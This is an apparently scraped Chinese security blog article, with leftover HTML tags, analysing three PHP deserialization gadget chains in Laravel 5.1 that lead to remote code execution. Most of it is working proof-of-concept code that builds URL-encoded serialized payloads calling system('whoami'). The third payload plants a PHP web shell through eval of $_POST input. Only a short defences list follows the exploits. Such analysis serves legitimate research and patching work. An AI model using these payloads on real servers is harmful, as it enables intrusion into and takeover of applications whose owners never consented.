Laravel 5.1 反序列化漏洞分析与利用<\/h1>

0x00 环境准备<\/h2>
使用Composer创建Laravel 5.1环境：<\/p>
composer create-project --prefer-dist laravel\/laravel laravel5.1 "5.1.*"<\/span>
<\/span><\/span><\/code><\/pre>0x01 反序列化漏洞分析<\/h2>
漏洞入口点<\/h3>
漏洞利用链从WindowsPipes<\/code>类的__destruct<\/code>方法开始：<\/p>
namespace<\/span> Symfony\Component\Process\Pipes<\/span>;
<\/span><\/span>class<\/span> WindowsPipes<\/span> {
<\/span><\/span>    private<\/span> $files =<\/span> array<\/span>();
<\/span><\/span>    public<\/span> function<\/span> __destruct() {
<\/span><\/span>        $this-><\/span>removeFiles<\/span>();
<\/span><\/span>    }
<\/span><\/span>    private<\/span> function<\/span> removeFiles<\/span>() {
<\/span><\/span>        foreach<\/span> ($this-><\/span>files<\/span> as<\/span> $filename) {
<\/span><\/span>            if<\/span> (file_exists<\/span>($filename)) {
<\/span><\/span>                @<\/span>unlink<\/span>($filename);
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>RCE1 - 通过View类的__toString方法<\/h3>


调用链<\/strong>:<\/p>

WindowsPipes::__destruct()<\/code> -> removeFiles()<\/code><\/li>
触发View::__toString()<\/code><\/li>
View::render()<\/code><\/li>
View::renderContent()<\/code><\/li>
$this->factory->incrementRender()<\/code> (调用任意类的__call<\/code>方法)<\/li>
<\/ul>
<\/li>

利用ValidGenerator<\/code>类的__call<\/code>方法<\/strong>:<\/p>
<\/li>
<\/ol>
namespace<\/span> Faker<\/span>;
<\/span><\/span>class<\/span> ValidGenerator<\/span> {
<\/span><\/span>    protected<\/span> $generator;
<\/span><\/span>    protected<\/span> $validator;
<\/span><\/span>    protected<\/span> $maxRetries;
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __call($name, $arguments) {
<\/span><\/span>        $res =<\/span> call_user_func_array<\/span>(array<\/span>($this-><\/span>generator<\/span>, $name), $arguments);
<\/span><\/span>        if<\/span> ($this-><\/span>validator<\/span>) {
<\/span><\/span>            call_user_func<\/span>($this-><\/span>validator<\/span>, $res);
<\/span><\/span>        }
<\/span><\/span>        return<\/span> $res;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
完整POC<\/strong>:<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> Faker<\/span>;
<\/span><\/span>class<\/span> DefaultGenerator<\/span>{
<\/span><\/span>    protected<\/span> $default;
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>default<\/span>=<\/span>'whoami'<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Faker<\/span>;
<\/span><\/span>class<\/span> ValidGenerator<\/span>{
<\/span><\/span>    protected<\/span> $generator;
<\/span><\/span>    protected<\/span> $validator;
<\/span><\/span>    protected<\/span> $maxRetries;
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>maxRetries<\/span>=<\/span>1<\/span>;
<\/span><\/span>        $this-><\/span>validator<\/span>=<\/span>'system'<\/span>;
<\/span><\/span>        $this-><\/span>generator<\/span>=<\/span>new<\/span> DefaultGenerator<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Illuminate\View<\/span>;
<\/span><\/span>use<\/span> Faker\ValidGenerator<\/span>;
<\/span><\/span>class<\/span> View<\/span>{
<\/span><\/span>    protected<\/span> $factory;
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>factory<\/span>=<\/span>new<\/span> ValidGenerator<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Symfony\Component\Process\Pipes<\/span>;
<\/span><\/span>use<\/span> Illuminate\View\View<\/span>;
<\/span><\/span>class<\/span> WindowsPipes<\/span>{
<\/span><\/span>    private<\/span> $files =<\/span> array<\/span>();
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>files<\/span> =<\/span> array<\/span>(new<\/span> View<\/span>());
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>echo<\/span> urlencode<\/span>(serialize<\/span>(new<\/span> WindowsPipes<\/span>()));
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>RCE2 - 通过DatabaseManager类的__call方法<\/h3>


调用链<\/strong>:<\/p>

DatabaseManager::__call()<\/code><\/li>
DatabaseManager::connection()<\/code><\/li>
DatabaseManager::makeConnection()<\/code><\/li>
call_user_func($this->extensions[$name], $config)<\/code><\/li>
<\/ul>
<\/li>

关键代码<\/strong>:<\/p>
<\/li>
<\/ol>
namespace<\/span> Illuminate\Database<\/span>;
<\/span><\/span>class<\/span> DatabaseManager<\/span>{
<\/span><\/span>    protected<\/span> $extensions =<\/span> array<\/span>();
<\/span><\/span>    protected<\/span> $app=<\/span>array<\/span>();
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> connection<\/span>($name =<\/span> null<\/span>) {
<\/span><\/span>        list<\/span>($name, $type) =<\/span> $this-><\/span>parseConnectionName<\/span>($name);
<\/span><\/span>        if<\/span> (!<\/span>isset<\/span>($this-><\/span>connections<\/span>[$name])) {
<\/span><\/span>            $connection =<\/span> $this-><\/span>makeConnection<\/span>($name);
<\/span><\/span>            $this-><\/span>connections<\/span>[$name] =<\/span> $this-><\/span>prepare<\/span>($connection);
<\/span><\/span>        }
<\/span><\/span>        return<\/span> $this-><\/span>connections<\/span>[$name];
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    protected<\/span> function<\/span> makeConnection<\/span>($name) {
<\/span><\/span>        $config =<\/span> $this-><\/span>getConfig<\/span>($name);
<\/span><\/span>        if<\/span> (isset<\/span>($this-><\/span>extensions<\/span>[$name])) {
<\/span><\/span>            return<\/span> call_user_func<\/span>($this-><\/span>extensions<\/span>[$name], $config);
<\/span><\/span>        }
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
完整POC<\/strong>:<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> Illuminate\Database<\/span>;
<\/span><\/span>class<\/span> DatabaseManager<\/span>{
<\/span><\/span>    protected<\/span> $extensions =<\/span> array<\/span>();
<\/span><\/span>    protected<\/span> $app=<\/span>array<\/span>();
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>extensions<\/span>['whoami'<\/span>]=<\/span>'call_user_func'<\/span>;
<\/span><\/span>        $this-><\/span>app<\/span>['config'<\/span>]['database.connections'<\/span>]=<\/span>['whoami'<\/span>=><\/span>'system'<\/span>];
<\/span><\/span>        $this-><\/span>app<\/span>['config'<\/span>]['database.default'<\/span>] =<\/span> 'whoami'<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Illuminate\View<\/span>;
<\/span><\/span>use<\/span> Illuminate\Database\DatabaseManager<\/span>;
<\/span><\/span>class<\/span> View<\/span>{
<\/span><\/span>    protected<\/span> $factory;
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>factory<\/span>=<\/span>new<\/span> DatabaseManager<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Symfony\Component\Process\Pipes<\/span>;
<\/span><\/span>use<\/span> Illuminate\View\View<\/span>;
<\/span><\/span>class<\/span> WindowsPipes<\/span>{
<\/span><\/span>    private<\/span> $files =<\/span> array<\/span>();
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>files<\/span> =<\/span> array<\/span>(new<\/span> View<\/span>());
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>echo<\/span> urlencode<\/span>(serialize<\/span>(new<\/span> WindowsPipes<\/span>()));
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>RCE3 - 通过Validator类的__call方法<\/h3>


调用链<\/strong>:<\/p>

Validator::__call()<\/code><\/li>
Validator::callExtension()<\/code><\/li>
Validator::callClassBasedExtension()<\/code><\/li>
EvalLoader::load()<\/code><\/li>
eval($definition->getCode())<\/code><\/li>
<\/ul>
<\/li>

关键代码<\/strong>:<\/p>
<\/li>
<\/ol>
namespace<\/span> Illuminate\Validation<\/span>;
<\/span><\/span>class<\/span> Validator<\/span>{
<\/span><\/span>    protected<\/span> $extensions =<\/span> [];
<\/span><\/span>    protected<\/span> $container;
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __call($method, $parameters) {
<\/span><\/span>        $rule =<\/span> Str<\/span>::<\/span>snake<\/span>(substr<\/span>($method, 8<\/span>));
<\/span><\/span>        if<\/span> (isset<\/span>($this-><\/span>extensions<\/span>[$rule])) {
<\/span><\/span>            return<\/span> $this-><\/span>callExtension<\/span>($rule, $parameters);
<\/span><\/span>        }
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    protected<\/span> function<\/span> callExtension<\/span>($rule, $parameters) {
<\/span><\/span>        $callback =<\/span> $this-><\/span>extensions<\/span>[$rule];
<\/span><\/span>        if<\/span> (is_string<\/span>($callback)) {
<\/span><\/span>            return<\/span> $this-><\/span>callClassBasedExtension<\/span>($callback, $rule, $parameters);
<\/span><\/span>        }
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    protected<\/span> function<\/span> callClassBasedExtension<\/span>($callback, $rule, $parameters) {
<\/span><\/span>        list<\/span>($class, $method) =<\/span> Str<\/span>::<\/span>parseCallback<\/span>($callback, '@'<\/span>);
<\/span><\/span>        return<\/span> call_user_func_array<\/span>(
<\/span><\/span>            [$this-><\/span>container<\/span>-><\/span>make<\/span>($class), $method], $parameters
<\/span><\/span>        );
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Mockery\Loader<\/span>;
<\/span><\/span>class<\/span> EvalLoader<\/span>{
<\/span><\/span>    public<\/span> function<\/span> load<\/span>(MockDefinition<\/span> $definition) {
<\/span><\/span>        if<\/span> (class_exists<\/span>($definition-><\/span>getClassName<\/span>(), false<\/span>)) {
<\/span><\/span>            return<\/span>;
<\/span><\/span>        }
<\/span><\/span>        eval<\/span>($definition-><\/span>getCode<\/span>());
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
完整POC<\/strong>:<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> Mockery\Loader<\/span>;
<\/span><\/span>class<\/span> EvalLoader<\/span>{}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Faker<\/span>;
<\/span><\/span>use<\/span> Mockery\Loader\EvalLoader<\/span>;
<\/span><\/span>class<\/span> DefaultGenerator<\/span>{
<\/span><\/span>    public<\/span> $default;
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>default<\/span>=<\/span>new<\/span> EvalLoader<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Illuminate\Validation<\/span>;
<\/span><\/span>use<\/span> Faker\DefaultGenerator<\/span>;
<\/span><\/span>class<\/span> Validator<\/span>{
<\/span><\/span>    protected<\/span> $extensions =<\/span> [];
<\/span><\/span>    protected<\/span> $container;
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>extensions<\/span>['y'<\/span>]=<\/span>'huahua@load'<\/span>;
<\/span><\/span>        $this-><\/span>container<\/span>=<\/span>new<\/span> DefaultGenerator<\/span>;
<\/span><\/span>    } 
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Mockery\Generator<\/span>;
<\/span><\/span>use<\/span> Faker\DefaultGenerator<\/span>;
<\/span><\/span>class<\/span> MockDefinition<\/span>{
<\/span><\/span>    protected<\/span> $config;
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>config<\/span>=<\/span>new<\/span> DefaultGenerator<\/span>;
<\/span><\/span>        $this-><\/span>config<\/span>-><\/span>default<\/span>=<\/span>'huahua'<\/span>;
<\/span><\/span>        $this-><\/span>code<\/span>=<\/span>'<?php eval($_POST[1]);'<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Prophecy\Argument\Token<\/span>;
<\/span><\/span>use<\/span> Illuminate\Validation\Validator<\/span>;
<\/span><\/span>use<\/span> Mockery\Generator\MockDefinition<\/span>;
<\/span><\/span>class<\/span> ObjectStateToken<\/span>{
<\/span><\/span>    private<\/span> $util;
<\/span><\/span>    private<\/span> $value;
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>util<\/span>=<\/span>new<\/span> Validator<\/span>;
<\/span><\/span>        $this-><\/span>value<\/span>=<\/span>new<\/span> MockDefinition<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Symfony\Component\Process\Pipes<\/span>;
<\/span><\/span>use<\/span> Prophecy\Argument\Token\ObjectStateToken<\/span>;
<\/span><\/span>class<\/span> WindowsPipes<\/span>{
<\/span><\/span>    private<\/span> $files =<\/span> array<\/span>();
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>files<\/span> =<\/span> array<\/span>(new<\/span> ObjectStateToken<\/span>());
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>echo<\/span> urlencode<\/span>(serialize<\/span>(new<\/span> WindowsPipes<\/span>()));
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>防御措施<\/h2>

升级到最新版本的Laravel框架<\/li>
避免反序列化用户可控的数据<\/li>
使用白名单机制限制反序列化的类<\/li>
实现__wakeup()<\/code>或__destruct()<\/code>方法的安全检查<\/li>
<\/ol>
总结<\/h2>
本文分析了Laravel 5.1中的三个反序列化漏洞利用链，展示了如何通过精心构造的序列化数据实现远程代码执行。这些漏洞的核心在于Laravel框架中多个类的魔术方法(__destruct<\/code>, __toString<\/code>, __call<\/code>)的不安全使用，以及PHP反序列化机制的特性。<\/p>